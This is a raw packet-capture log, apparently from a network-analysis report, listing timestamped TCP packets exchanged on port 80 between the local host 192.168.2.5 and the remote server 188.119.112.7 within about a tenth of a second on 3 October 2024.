                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457210064 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457222939 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457258940 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457259893 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457292080 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457324982 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457355976 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457377911 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457389116 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457405090 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457423925 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457746983 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457778931 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457798004 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457812071 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457823992 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457847118 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457880020 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.457931995 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458106041 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458138943 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458159924 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458172083 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458204985 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458237886 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458239079 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458271027 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458281040 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458304882 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458338022 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458369970 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458384991 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458403111 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458415985 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458436012 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458472013 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458549976 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458848000 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458884001 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458899975 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458916903 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.458969116 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459001064 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459014893 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459034920 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459048033 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459069014 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459101915 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459136009 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459148884 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459168911 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459182978 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459202051 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459234953 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459268093 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459280014 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459300995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459311008 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459726095 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459762096 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459811926 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459839106 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459884882 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459891081 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459924936 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459958076 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.459992886 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460005999 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460026979 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460047960 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460061073 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460093975 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460127115 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460140944 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460160017 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460170984 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460194111 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460226059 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460258961 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460262060 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460300922 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460676908 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460711002 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460743904 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460767031 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460794926 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460827112 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460859060 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460880995 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460905075 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460928917 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460963964 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.460997105 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461018085 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461030006 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461062908 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461095095 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461108923 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461128950 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461137056 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461163044 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461195946 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461229086 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461246014 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461273909 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461674929 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461724997 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461759090 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461775064 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461793900 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461827040 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461843014 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461859941 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461894035 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461918116 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461926937 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461977959 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.461998940 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462032080 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462064981 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462083101 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462097883 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462131977 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462152004 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462163925 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462210894 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462553024 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462587118 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462620020 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462652922 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462675095 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462686062 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.462707043 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.499763012 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502665997 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502721071 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502753973 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502795935 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502865076 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502867937 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502897024 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502929926 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502943039 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502963066 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.502995968 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.503047943 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.504829884 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.504964113 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543292046 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543329000 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543360949 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543370962 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543412924 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543446064 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543462038 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543481112 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543493032 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543596029 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543628931 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543662071 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543684006 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543694973 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543704033 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543812037 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543845892 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543879986 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543893099 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543915987 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.543924093 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544085026 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544116974 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544150114 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544164896 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544183016 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544194937 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544389009 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544420958 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544454098 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544466972 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544487000 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544498920 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544522047 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544554949 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544585943 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544588089 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544620991 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544630051 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544655085 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544715881 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544774055 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544939995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544972897 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.544987917 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545006037 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545038939 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545048952 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545072079 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545104027 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545137882 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545155048 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545170069 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545182943 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545202971 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545234919 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545253038 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545270920 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545504093 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545646906 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545680046 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545711994 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545744896 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545758963 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545779943 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545787096 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545814037 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545846939 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545880079 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545892000 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545914888 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.545927048 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546148062 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546175957 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546207905 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546222925 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546241999 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546256065 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546274900 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546307087 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546339989 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546350956 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546382904 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546673059 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546706915 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546739101 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546768904 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546789885 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546802044 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546811104 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546835899 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546869040 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546902895 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546915054 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546936035 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546946049 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.546971083 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547003984 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547036886 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547049046 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547071934 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547080040 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547105074 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547137976 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547168016 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547182083 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547202110 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547211885 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547605991 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547638893 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547672033 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547688961 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547703981 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547717094 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.547736883 CEST8049704188.119.112.7192.168.2.5
